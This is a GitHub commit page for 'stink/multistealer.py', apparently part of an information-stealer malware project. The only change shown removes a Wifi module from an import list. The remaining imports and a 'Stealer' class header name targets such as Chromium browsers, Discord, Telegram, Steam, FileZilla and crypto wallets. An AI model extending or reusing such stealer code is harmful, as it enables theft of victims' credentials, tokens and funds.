Skip to content

Commit

Permalink
Code refactored
Browse files Browse the repository at this point in the history
  • Loading branch information
FallenAstaroth committed Oct 23, 2023
1 parent 798e68a commit 4c96596
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion stink/multistealer.py
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@
from stink.utils import Autostart, Message
from stink.helpers import functions, MemoryStorage
from stink.helpers.config import MultistealerConfig, Browsers
from stink.modules import Chromium, Discord, FileZilla, Processes, Screenshot, System, Telegram, Steam, Wallets, Wifi
from stink.modules import Chromium, Discord, FileZilla, Processes, Screenshot, System, Telegram, Steam, Wallets


class Stealer(Thread):
Expand Down

0 comments on commit 4c96596

Please sign in to comment.